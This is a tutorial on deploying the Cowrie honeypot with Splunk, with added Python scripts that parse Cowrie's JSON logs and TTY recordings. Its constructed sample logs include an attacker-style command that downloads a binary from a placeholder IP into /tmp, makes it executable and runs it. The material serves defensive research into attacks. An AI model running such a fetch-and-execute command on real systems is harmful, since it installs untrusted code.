Learn how to deploy a Honeypot and visualise its data step by step

Detailed instructions on how to deploy the Cowrie honeypot monitored by Splunk.

The Manuka Honeypot — Keep reading and you’ll have this running in no time!

If you want to observe live, real-world attack activity instead of reading about it, the most direct way is to deploy a honeypot.

Here are some step by step instructions that are fully working at the time of writing this article and that should have you gathering data in 30 minutes.

Disclaimer: As of May 2019 there are already many tools that automate this whole process (the Modern Honey Network is a famous one), but most of them are no longer maintained and their automation scripts no longer work (dependencies, Python 3, and all that black magic), hence the step-by-step process. Plus, you get to understand how the tools actually work.

0. What are we going to deploy:

Two devices on the cloud:

Device 1: Runs the Cowrie honeypot, registers all the data, then sends its logs.

Device 2: Runs Splunk Free, collects logs, and prints out cool graphs.

These devices will be deployed in DigitalOcean cloud because:

  1. There’s a free $100 credit! (if you’re considering running this experiment use my referral link 🙂)
  2. I am not setting a honeypot anywhere near any of my networks.

*Note: Google Cloud also provides free credit at this time.

1. Installing and tweaking Cowrie:

Start by deploying a basic $5 a month Droplet on DigitalOcean with 1 GB of RAM and 1 CPU; I found Ubuntu 18.10 x64 worked well:


You will immediately receive an email with the user/password to SSH into it (better: add an SSH key when creating the Droplet; a root password sent by email is not what you want on a box that is about to be attacked all day).

-Remember to change your terminal settings to the Matrix colour scheme for extra hacking skills-

I will follow the steps detailed in the Cowrie project’s GitHub page but here’s some easy copy pasting assistance:

sudo apt-get update
sudo apt-get install git python-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind

Then add a cowrie user and switch to it. We can't (and really don't want to) run Cowrie as root:

sudo adduser --disabled-password cowrie
sudo su - cowrie

Download Cowrie’s code:

git clone https://github.com/cowrie/cowrie

Set up a Python virtual environment for Cowrie (this is the Python venv Cowrie runs in, not the fake OS the attacker will see):

cd /home/cowrie/cowrie
virtualenv --python=python3 cowrie-env
source cowrie-env/bin/activate
(cowrie-env) $ pip install --upgrade pip
(cowrie-env) $ pip install --upgrade -r requirements.txt

cowrie.cfg.dist holds the defaults and should stay untouched; Cowrie also reads etc/cowrie.cfg, whose entries take precedence, so copy the defaults to that file and edit the copy:

cp /home/cowrie/cowrie/etc/cowrie.cfg.dist /home/cowrie/cowrie/etc/cowrie.cfg

This is Cowrie's configuration file. Enabling Telnet, changing the hostname the attacker sees (so the box does not look like a stock Cowrie honeypot) and similar tweaks all happen here.

For example, let's change the hostname. Most fields are self-explanatory; find the hostname line in the [honeypot] section and change it to something like:

hostname = UbuntuServer4

To have the honeypot listen on port 22 (by default it listens on 2222, which is why most automated scanners would never reach it) we need a few changes:

In cowrie.cfg, in the [ssh] section:

listen_endpoints = tcp:22:interface=0.0.0.0

Note: Cowrie needs a restart every time you make changes in the config file.

Then run these commands so the unprivileged cowrie user can bind port 22 (ports below 1024 are reserved for root, and we are not running Cowrie as root):

sudo apt-get install authbind
sudo touch /etc/authbind/byport/22
sudo chown cowrie:cowrie /etc/authbind/byport/22
sudo chmod 770 /etc/authbind/byport/22

Cowrie's launcher only wraps the process in authbind when AUTHBIND_ENABLED is set to yes in bin/cowrie (see the "Listening on port 22" section of the Cowrie README), so make that edit too, otherwise the bind to port 22 fails with a permission error.

Then move the real SSH daemon off port 22: edit /etc/ssh/sshd_config, uncomment the Port line and set it to a high random port (don't pick 2222, come on!), then restart the ssh service. Cowrie can only bind port 22 once sshd has left it. Do this from your existing session and, before closing it, open a second SSH connection to the new port to confirm it works (if the Droplet has a firewall, allow the new port first). If you log in with a key, this is also the moment to set PasswordAuthentication no: a daemon on a high port still gets found by full port scans.

vim /etc/ssh/sshd_config   # uncomment the Port line and change the number
service ssh restart

Finally, put Cowrie under supervisord so it is daemonized and restarted automatically. Run this as root (exit the cowrie shell first). The paths below match the /home/cowrie/cowrie checkout used above, not the /opt/cowrie location the Cowrie README's example assumes:

apt install supervisor
cat > /etc/supervisor/conf.d/cowrie.conf <<EOF
[program:cowrie]
command=/home/cowrie/cowrie/bin/cowrie start
directory=/home/cowrie/cowrie
stdout_logfile=/home/cowrie/cowrie/var/log/cowrie/cowrie.out
stderr_logfile=/home/cowrie/cowrie/var/log/cowrie/cowrie.err
autostart=true
autorestart=true
stopasgroup=true
killasgroup=true
user=cowrie
EOF
supervisorctl update

Supervisord expects the program to stay in the foreground, so also change DAEMONIZE="" to DAEMONIZE="-n" in bin/cowrie, as the README's supervisord section notes.

Troubleshoot now if it has been daemonized correctly:

root@Cowrie:~# supervisorctl
cowrie RUNNING pid 1007, uptime 0:16:44

Nice.

Also check netstat to verify that the correct process is listening on each port:

root@Cowrie:~# netstat -tanpl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:32328 0.0.0.0:* LISTEN 922/sshd
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 639/systemd-resolve
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1007/python3

Nice.

Python listening on port 22 is the fake system; sshd on the high port is our real SSH (if you lock yourself out, the DigitalOcean console still gets you in).

Took a lot of copy pasting to get here but think about all the… L E A R N I N G

BONUS STEPS:

1. Do the following to control which logins the honeypot accepts:

First copy userdb.example to userdb.txt so we can edit it:

cp /home/cowrie/cowrie/etc/userdb.example /home/cowrie/cowrie/etc/userdb.txt

Then edit the file following the comments in it.

Protip: Make the honeypot more convincing by limiting which logins get in; a box that accepts every password looks like a honeypot.

Protip 2: Allow everything if you want to study botnet campaigns at volume.

2. Integration with VirusTotal:

Go to VirusTotal, create a free account and copy your API key. Keep in mind that with upload = True every file an attacker drops on the honeypot is uploaded to VirusTotal and becomes visible to other VirusTotal users; for commodity malware that is the point, but know it is happening.

Go to the cowrie.cfg file and uncomment the VirusTotal section:

[output_virustotal]
enabled = true
api_key = ***paste here your API KEY***
upload = True
debug = False
scan_file = True
scan_url = True

It is a great idea to take a DigitalOcean snapshot of the Droplet at this point (snapshots are billed per GB stored, a few cents a month for a box this size); it beats repeating all of the above :)

2. Deploying Splunk:

To deploy Splunk we need a second Droplet. (You could do everything on one, but keeping the collector separate scales, since you can add more honeypots later and point them all at the same Splunk, and it keeps your logs and the Splunk web UI off the one machine you are deliberately inviting attackers onto.)

In this case I use a slightly bigger Droplet:


Create an account on Splunk and download the Free version (Splunk Free indexes up to 500 MB a day, which you hopefully won't hit yet!).

Pick the Linux .tgz and click "Download via Command Line (wget)": it gives you a wget one-liner to paste into the Droplet.

cd /opt/
wget -O splunk-7.2..   # paste the exact command from the download page
tar -zxvf splunk-7.2...
cd /opt/splunk/bin/
./splunk start

Accept the license, set up an admin user/password, and then access the GUI at http://WhateverYourSplunkIpIs:8000

Two caveats. Started this way Splunk runs as root, which is fine for a throwaway experiment but not for anything you keep. And port 8000 is plain HTTP on a public address, so restrict it with a DigitalOcean cloud firewall or ufw to your own IP, and allow port 8088 (the HTTP Event Collector port we will use next) only from the honeypot Droplet.

3. Connect Cowrie to Splunk

Hi, I have no idea of how Splunk works and welcome to Jackass.

To connect Cowrie, the Splunk blog post on Cowrie explains it pretty well. In summary, the order that avoids backtracking is: create the index, create the HTTP Event Collector (HEC) token that writes to that index, then point Cowrie at it.

In Splunk, on the top menu go to Settings > Indexes, click New Index and create one named "cowrie" (leave the rest at defaults).

Then go to Settings > Add Data > Monitor > HTTP Event Collector. Give it a name, leave everything else automatic except the index, where you pick "cowrie" as the default index, and copy the Token you get at the end. (If you created the collector before the index, edit it under Settings > Data inputs > HTTP Event Collector and set its index to "cowrie".) HEC is disabled by default in Splunk Enterprise; Global Settings on the same page lets you enable it if the wizard did not, and shows the port it listens on, 8088.

On the honeypot Droplet, open cowrie.cfg and uncomment the output_splunk section, filling in the public IP of the Splunk Droplet and the Token:

[output_splunk]
enabled = true
url = https://WhateverYourSplunkIpIs:8088/services/collector/event
token = xxxxxxxxxxxxxx
index = cowrie
sourcetype = cowrie
source = cowrie

Then restart Cowrie (through supervisorctl, since it is supervised now) and it will start sending events.

Back in Splunk, Settings > Indexes should now show the "cowrie" index with a recent "latest event".

If it doesn't, well, shit. Check var/log/cowrie/cowrie.log on the honeypot for errors from the Splunk output plugin, confirm that port 8088 on the Splunk Droplet is reachable from the honeypot (firewall!), and confirm the Token is the one you pasted.

4. Start looking at the fancy graphs:

Go to the top left of Splunk and click on Apps>Manage Apps

Then select Install app from file and install the Manuka Honeypot:

Manuka HoneyPot.tgz

This is a Splunk App that I created specifically for Cowrie.

There are many apps out there (MHN, Tango, EngagedThreat...) but as of 2019 all are mostly outdated, for the reason given in the disclaimer at the top.

Leave the honeypot running for a few hours (or minutes, to be fair) and you will start seeing results.

Now this is the cool part. Splunk is kind of Excel on steroids when it comes to graphs.

Some of the dashboards you will see (screenshots in the original post):

First, an overview.
A bit more detail on who they are and what they are doing.
Keep an eye out for the username "mother" (sadly not in the picture).
VirusTotal submission results.
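Every one of those dashboards is a count or a group-by over the JSON events Cowrie writes to var/log/cowrie/cowrie.json (the same events the [output_splunk] section ships to HEC). The script below is an added example, not code from this article or from the Cowrie project: it answers the same questions offline over a handful of constructed log lines, so you can see what the panels compute before Splunk is in the picture and sanity-check the numbers Splunk shows. The field names (eventid, src_ip, username, password, input, session, url, shasum) follow Cowrie's JSON output; the log lines, addresses and session ids are made up, and the last line is deliberately cut off, as happens when you copy a log Cowrie is still writing.

```python
"""Offline summary of Cowrie JSON events: the questions the Splunk dashboards
answer, without Splunk.  Added example; not code from the article or from the
Cowrie project.  SAMPLE_LOG is constructed (documentation-range addresses,
made-up session ids); its field names follow Cowrie's JSON output format."""
import json
from collections import Counter, defaultdict

SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.7", "src_port": 51234, "dst_port": 22, "session": "a1b2c3d4e5f6", "timestamp": "2019-05-08T05:40:01.000000Z", "sensor": "UbuntuServer4", "message": "New connection: 198.51.100.7:51234"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2019-05-08T05:40:02.000000Z", "sensor": "UbuntuServer4", "message": "login attempt [root/123456] failed"}
{"eventid": "cowrie.login.success", "username": "admin", "password": "admin", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2019-05-08T05:40:03.000000Z", "sensor": "UbuntuServer4", "message": "login attempt [admin/admin] succeeded"}
{"eventid": "cowrie.command.input", "input": "uname -a", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2019-05-08T05:40:05.000000Z", "sensor": "UbuntuServer4", "message": "CMD: uname -a"}
{"eventid": "cowrie.command.input", "input": "wget http://198.51.100.9/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2019-05-08T05:40:09.000000Z", "sensor": "UbuntuServer4", "message": "CMD: wget http://198.51.100.9/x86 -O /tmp/x86; chmod +x /tmp/x86; /tmp/x86"}
{"eventid": "cowrie.session.file_download", "url": "http://198.51.100.9/x86", "outfile": "var/lib/cowrie/downloads/22cd32d7e0061023a685158d46903d35c8369d9f1c158daadddc0ca2b3129ba3", "shasum": "22cd32d7e0061023a685158d46903d35c8369d9f1c158daadddc0ca2b3129ba3", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "timestamp": "2019-05-08T05:40:10.000000Z", "sensor": "UbuntuServer4", "message": "Downloaded URL (http://198.51.100.9/x86) with SHA-256 22cd32d7e0061023a685158d46903d35c8369d9f1c158daadddc0ca2b3129ba3"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "root", "src_ip": "203.0.113.44", "session": "0f0f0f0f0f0f", "timestamp": "2019-05-08T05:41:00.000000Z", "sensor": "UbuntuServer4", "message": "login attempt [root/root] failed"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.44", "session": "0f0f0f0f0f0f", "timestamp": "2019-05-08T05:41:01.000000Z", "sensor": "UbuntuServer4", "message": "login attempt [root/123456] failed"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.44", "session": "0f0f0f0f0f0f", "timest
"""


def parse_events(text):
    """One JSON object per line.  A half-written last line (the file was copied
    while Cowrie was mid-write) is skipped instead of aborting the whole run."""
    events = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue
        if isinstance(event, dict) and "eventid" in event:
            events.append(event)
    return events


def summarise(events):
    """Group the events the way the dashboard panels do."""
    summary = {
        "attempts_per_ip": Counter(),        # brute-force volume per source
        "credentials": Counter(),            # (username, password) pairs tried
        "successful_logins": Counter(),      # sources that got a shell
        "commands": Counter(),               # what they typed once inside
        "downloads": [],                     # what they pulled onto the box
        "commands_per_session": defaultdict(list),
    }
    for event in events:
        kind = event["eventid"]
        src = event.get("src_ip", "unknown")
        if kind in ("cowrie.login.failed", "cowrie.login.success"):
            summary["attempts_per_ip"][src] += 1
            summary["credentials"][(event.get("username"), event.get("password"))] += 1
            if kind == "cowrie.login.success":
                summary["successful_logins"][src] += 1
        elif kind == "cowrie.command.input":
            summary["commands"][event.get("input", "")] += 1
            summary["commands_per_session"][event.get("session")].append(event.get("input", ""))
        elif kind == "cowrie.session.file_download":
            summary["downloads"].append(
                {"src_ip": src, "url": event.get("url"), "shasum": event.get("shasum")}
            )
    return summary


def brute_forcers(summary, threshold=2):
    """Sources with at least `threshold` login attempts, busiest first."""
    hits = [(n, ip) for ip, n in summary["attempts_per_ip"].items() if n >= threshold]
    return [ip for n, ip in sorted(hits, key=lambda pair: (-pair[0], pair[1]))]


def download_hashes(summary):
    """Distinct SHA-256 of dropped files: the keys you look up on VirusTotal or
    match against var/lib/cowrie/downloads/ on the honeypot."""
    return sorted({d["shasum"] for d in summary["downloads"] if d["shasum"]})


if __name__ == "__main__":
    s = summarise(parse_events(SAMPLE_LOG))
    print("login attempts per source:", dict(s["attempts_per_ip"]))
    print("top credentials:", s["credentials"].most_common(3))
    print("brute-forcers:", brute_forcers(s))
    print("commands:", list(s["commands"]))
    print("dropped files:", download_hashes(s))
```

To run it against a real honeypot, replace SAMPLE_LOG with the contents of var/log/cowrie/cowrie.json; the sha256 values it lists are also the file names under var/lib/cowrie/downloads/, which is how the VirusTotal dashboard ties a submission back to the session that dropped it.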

5. Replay CLI recordings:

Terminal recordings are stored in the tty directory (on the Cowrie machine!):

/home/cowrie/cowrie/var/lib/cowrie/tty

Go there and see if there are any recordings:

cd /home/cowrie/cowrie/var/lib/cowrie/tty
ls -la
total 28
drwxrwxr-x 2 cowrie cowrie 4096 May 8 06:35 .
drwxrwxr-x 4 cowrie cowrie 4096 May 7 04:28 ..
-rw-rw-r-- 1 cowrie cowrie 2 May 7 03:38 .gitignore
-rw-r--r-- 1 cowrie cowrie 4750 May 8 05:52 22cd32d7e0061023a685158d46903d35c8369d9f1c158daadddc0ca2b3129ba3
-rw-r--r-- 1 cowrie cowrie 432 May 7 05:02 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
-rw-r--r-- 1 cowrie cowrie 2222 May 8 05:45 f4518faf335e77750bc7a61d3e9c0df3c0740c62540259417fec9c067bd2f070

There’s a few!

Then go to the bin directory:

/home/cowrie/cowrie/bin

and run playlog, giving it the full path of a file from the tty directory:

./playlog /home/cowrie/cowrie/var/lib/cowrie/tty/22cd32d7e0061023a685158d46903d35c8369d9f1c158daadddc0ca2b3129ba3

There's a dashboard that lists all recently captured TTY activity and makes things a bit easier:

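playlog replays one recording to your terminal, which is great for watching a session but not for pulling the typed commands out of hundreds of files and counting them. The script below is an added example (not the article's or Cowrie's code) that decodes a recording directly and copes with a recording that is still being written, i.e. a truncated final record. Its record layout is an assumption about Cowrie's ttylog format: a little-endian '<iLiiLL' header (op, tty, length, direction, seconds, microseconds) followed by the data bytes, as in cowrie/core/ttylog.py at the time of writing; verify it against your checkout before trusting it on real files. The recording it decodes is built inside the script, not captured.

```python
"""Decode a Cowrie TTY recording without playlog.  Added example; not code
from the article or from the Cowrie project.  Assumption (check against
cowrie/core/ttylog.py in your checkout): each record is a little-endian
'<iLiiLL' header (op, tty, length, direction, seconds, microseconds) followed
by `length` bytes of data, with op 1/2/3 = open/close/write and direction
1 = attacker input, 2 = honeypot output.  The recording built below is
constructed, not a real capture."""
import struct

HEADER = "<iLiiLL"
HEADER_SIZE = struct.calcsize(HEADER)
OP_OPEN, OP_CLOSE, OP_WRITE = 1, 2, 3
TYPE_INPUT, TYPE_OUTPUT = 1, 2


def record(op, direction, stamp, data=b""):
    """Serialise one record the way the honeypot's writer is assumed to."""
    sec = int(stamp)
    usec = int(1_000_000 * (stamp - sec))
    return struct.pack(HEADER, op, 0, len(data), direction, sec, usec) + data


def build_sample_recording():
    """A short fake session: prompt, two commands, their output, hang-up."""
    t = 1557294000.0  # arbitrary start time; offsets are exact binary fractions
    return b"".join([
        record(OP_OPEN, 0, t),
        record(OP_WRITE, TYPE_OUTPUT, t + 0.25, b"UbuntuServer4:~# "),
        record(OP_WRITE, TYPE_INPUT, t + 1.5, b"uname -a\n"),
        record(OP_WRITE, TYPE_OUTPUT, t + 1.75,
               b"Linux UbuntuServer4 3.2.0-4-amd64 #1 SMP x86_64 GNU/Linux\nUbuntuServer4:~# "),
        record(OP_WRITE, TYPE_INPUT, t + 4.0, b"wget http://198.51.100.9/x86 -O /tmp/x86\n"),
        record(OP_WRITE, TYPE_OUTPUT, t + 4.5, b"Connecting to 198.51.100.9\nUbuntuServer4:~# "),
        record(OP_CLOSE, 0, t + 12.0),
    ])


def decode_recording(blob):
    """Yield (op, direction, timestamp, data).  A file cut mid-record (Cowrie was
    still writing it, or the disk filled up) ends the iteration instead of
    mis-parsing leftover bytes as a header."""
    offset = 0
    while offset + HEADER_SIZE <= len(blob):
        op, _tty, length, direction, sec, usec = struct.unpack_from(HEADER, blob, offset)
        offset += HEADER_SIZE
        data = blob[offset:offset + length]
        if len(data) < length:
            break
        offset += length
        yield op, direction, sec + usec / 1_000_000, data


def transcript(blob):
    """(what the attacker typed, what the fake shell showed), as text."""
    typed = b"".join(d for op, dr, _, d in decode_recording(blob)
                     if op == OP_WRITE and dr == TYPE_INPUT)
    shown = b"".join(d for op, dr, _, d in decode_recording(blob)
                     if op == OP_WRITE and dr == TYPE_OUTPUT)
    return typed.decode("utf-8", "replace"), shown.decode("utf-8", "replace")


def commands_typed(blob):
    """Attacker input split into command lines, blank lines dropped."""
    typed, _ = transcript(blob)
    return [line.strip() for line in typed.splitlines() if line.strip()]


def session_duration(blob):
    """Seconds between open and close, or None if the close record never made it."""
    stamps = [t for op, _, t, _ in decode_recording(blob) if op in (OP_OPEN, OP_CLOSE)]
    return stamps[-1] - stamps[0] if len(stamps) >= 2 else None


if __name__ == "__main__":
    blob = build_sample_recording()
    print("commands:", commands_typed(blob))
    print("duration:", session_duration(blob), "s")
    print(transcript(blob)[1])
```

Point decode_recording at the bytes of a file from the tty directory and loop over the directory to get a command frequency table across all sessions; the truncation check matters there because the newest file is usually the one an attacker is still typing into.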

6. Bonus:

Try a few things; for example, modify userdb.txt so a user accepts any password.

You allow all passwords for a user with a line like the one below (per the comments in userdb.example, "*" matches anything, a password prefixed with "!" is rejected, and lines are checked top to bottom with the first match winning, so put the "!" denials above the "*" line):

admin:x:*

If you followed every instruction step by step, and neither the Ubuntu images on DigitalOcean nor the Cowrie project have changed too much since May 2019, this should be working flawlessly.

Happy hunting and looking forward to any feedback on this!
